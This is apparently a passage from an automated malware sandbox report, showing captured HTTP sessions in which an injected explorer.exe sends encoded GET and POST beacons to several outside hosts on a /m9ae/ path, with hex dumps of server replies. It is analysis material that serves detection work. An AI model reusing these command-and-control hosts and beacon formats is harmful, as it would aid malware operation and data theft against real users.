                                                                                                                        Data Ascii: F6z4=3kFEYJUKK5dOG9AYsz2nAhfs9hXh9e~rw5Vh~ZE63cZ-ZSVuhfCaUp7FSdTQEnR4DnzirsJvs07rL7UqNRk1dwrBbX~aBYelW_4DLT7qDVcc2niGDnEDDI4XFCA8Vq69TNy374Ys6MySRrxn4UbhhZ8LSRpoFvaFSddrnslAGJ5ZVCtH6A).
                                                                                                                        Nov 29, 2022 10:36:26.378156900 CET338INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 29 Nov 2022 09:36:26 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 146
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        36192.168.2.54975238.163.214.16980C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:36:28.398721933 CET338OUTGET /m9ae/?F6z4=6mtkb9sgLdU5EKgBox+sPzjX7gz7/N2rxrRH87049IJ0dh9Tn6WPD5ftVfyzJnBGA3PJpfJHiW/BJrwPQwZWSWvRAWejN4CLLw==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1
                                                                                                                        Host: www.bookmygennie.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 29, 2022 10:36:28.568582058 CET339INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 29 Nov 2022 09:36:28 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 146
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        37192.168.2.54975323.111.12.17780C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:36:33.799280882 CET340OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.amspustaka.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 410
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.amspustaka.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.amspustaka.com/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 6e 58 52 6a 42 4c 73 2d 57 69 71 50 53 78 4c 46 78 6d 73 52 28 59 6d 35 77 48 50 70 66 42 6a 70 28 66 75 77 47 56 65 55 31 31 69 41 7e 79 4c 5a 72 74 41 77 72 47 75 4c 78 41 59 36 6b 59 38 6f 4e 45 35 65 65 56 56 4a 58 48 69 4b 67 39 39 4c 67 44 42 51 55 56 37 4d 66 57 7a 6e 58 35 52 4a 7a 6b 4d 56 7e 61 76 57 38 7a 67 4b 57 41 52 7a 30 47 6f 30 4d 6a 44 4d 42 41 66 46 72 56 5a 43 72 32 79 72 52 4e 76 43 5a 56 6e 72 54 30 73 6d 37 72 48 5f 78 75 79 62 6f 5f 52 38 76 30 35 42 4f 63 6d 6f 30 49 67 72 7e 75 66 52 55 72 66 55 59 51 6f 4a 74 5f 73 46 72 63 44 71 43 51 64 5a 6f 39 71 52 78 78 75 5a 75 43 56 58 4e 75 57 34 35 75 43 4b 47 47 6c 58 4f 53 56 6c 37 37 79 54 72 65 34 48 44 44 45 47 66 4a 47 6f 57 6b 52 35 53 65 73 65 6d 5a 28 30 50 48 66 4a 64 57 78 5f 71 6b 44 5a 64 36 47 58 44 6b 7a 30 6c 47 53 6a 66 64 44 31 6e 34 4b 45 6e 68 50 65 47 4b 45 30 65 62 30 4c 32 64 37 77 68 6b 44 76 35 58 38 67 7a 4f 58 4c 42 48 75 70 5a 44 7e 6f 31 78 49 49 65 70 42 44 67 4b 77 70 77 74 41 64 48 4e 6f 6a 36 4b 77 70 39 65 61 5a 62 33 31 39 44 6c 73 41 72 4c 68 66 59 35 35 58 4d 64 69 7a 34 70 7a 61 61 44 35 4e 30 74 49 70 48 45 37 4b 4f 50 33 4c 37 71 42 51 71 6e 41 54 4e 65 53 53 7e 47 6e 4e 7a 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=nXRjBLs-WiqPSxLFxmsR(Ym5wHPpfBjp(fuwGVeU11iA~yLZrtAwrGuLxAY6kY8oNE5eeVVJXHiKg99LgDBQUV7MfWznX5RJzkMV~avW8zgKWARz0Go0MjDMBAfFrVZCr2yrRNvCZVnrT0sm7rH_xuybo_R8v05BOcmo0Igr~ufRUrfUYQoJt_sFrcDqCQdZo9qRxxuZuCVXNuW45uCKGGlXOSVl77yTre4HDDEGfJGoWkR5SesemZ(0PHfJdWx_qkDZd6GXDkz0lGSjfdD1n4KEnhPeGKE0eb0L2d7whkDv5X8gzOXLBHupZD~o1xIIepBDgKwpwtAdHNoj6Kwp9eaZb319DlsArLhfY55XMdiz4pzaaD5N0tIpHE7KOP3L7qBQqnATNeSS~GnNzg).
                                                                                                                        Nov 29, 2022 10:36:33.969059944 CET342INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 29 Nov 2022 09:36:33 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Server: imunify360-webshield/1.18
                                                                                                                        Last-Modified: Tuesday, 29-Nov-2022 09:36:33 GMT
                                                                                                                        Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0
                                                                                                                        cf-edge-cache: no-cache
                                                                                                                        Data Raw: 35 30 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c
                                                                                                                        Data Ascii: 50b<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+![])+(+!+[]+!![]+[])+(+!+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])), east=+((+!+[]+!![]+!![])+(+!+[]+[])+(+!+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+![])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])), x=function(){try{return !!window.addEventL
                                                                                                                        Nov 29, 2022 10:36:33.969115019 CET342INData Raw: 69 73 74 65 6e 65 72 3b 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 21 21 30 3b 7d 20 7d 2c 0a 20 20 20 20 20 20 20 20 79 3d 66 75 6e 63 74 69 6f 6e 28 79 2c 7a 29 7b 78 28 29 20 3f 20 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c
                                                                                                                        Data Ascii: istener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange",y);}; y(function(){ document.getElementById('wsidchk').value = west + eas
                                                                                                                        Nov 29, 2022 10:36:33.969141960 CET342INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        38192.168.2.54975423.111.12.17780C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:36:35.984519005 CET343OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.amspustaka.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 186
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.amspustaka.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.amspustaka.com/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 6e 58 52 6a 42 4c 73 2d 57 69 71 50 54 47 58 46 79 52 34 52 30 34 6d 35 39 6e 50 30 66 42 6a 71 28 66 75 30 47 52 47 45 31 43 7e 41 39 6a 58 5a 72 37 30 77 6f 47 75 4b 35 67 5a 39 71 34 39 79 4e 45 35 34 65 51 31 4a 58 48 47 4b 67 38 4e 4c 67 77 70 54 58 56 37 30 5a 57 7a 67 54 35 52 51 7a 6b 51 42 7e 62 44 57 38 33 51 4b 4b 6a 35 7a 33 51 30 37 49 44 44 4a 45 41 66 43 67 31 5a 57 72 32 79 42 52 4e 76 6b 5a 54 72 72 55 45 38 6d 70 5a 76 38 6f 65 7a 52 32 50 52 72 6a 6c 64 49 4d 39 75 70 32 61 78 50 68 39 36 4a 61 4c 4b 75 50 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=nXRjBLs-WiqPTGXFyR4R04m59nP0fBjq(fu0GRGE1C~A9jXZr70woGuK5gZ9q49yNE54eQ1JXHGKg8NLgwpTXV70ZWzgT5RQzkQB~bDW83QKKj5z3Q07IDDJEAfCg1ZWr2yBRNvkZTrrUE8mpZv8oezR2PRrjldIM9up2axPh96JaLKuPw).
                                                                                                                        Nov 29, 2022 10:36:36.146116972 CET344INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 29 Nov 2022 09:36:36 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Server: imunify360-webshield/1.18
                                                                                                                        Last-Modified: Tuesday, 29-Nov-2022 09:36:36 GMT
                                                                                                                        Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0
                                                                                                                        cf-edge-cache: no-cache
                                                                                                                        Data Raw: 35 38 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21
                                                                                                                        Data Ascii: 58c<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])), east=+((+!+[])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!
                                                                                                                        Nov 29, 2022 10:36:36.146146059 CET345INData Raw: 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20
                                                                                                                        Data Ascii: ![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z)
                                                                                                                        Nov 29, 2022 10:36:36.146167040 CET345INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        39192.168.2.54975523.111.12.17780C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:36:38.176141977 CET346OUTGET /m9ae/?F6z4=qV5DC7gvSDrvRRGewn1q/I/EwjqoLGbs6Pm0OHOL9iW03iXh+4kaxlrb2hUer6xMCUxzC2FjXkfJjvQV3jFRWlDNN37fVrd03A==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1
                                                                                                                        Host: www.amspustaka.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 29, 2022 10:36:38.341603041 CET347INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 29 Nov 2022 09:36:38 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Server: imunify360-webshield/1.18
                                                                                                                        Last-Modified: Tuesday, 29-Nov-2022 09:36:38 GMT
                                                                                                                        Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0
                                                                                                                        cf-edge-cache: no-cache
                                                                                                                        Data Raw: 35 35 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d
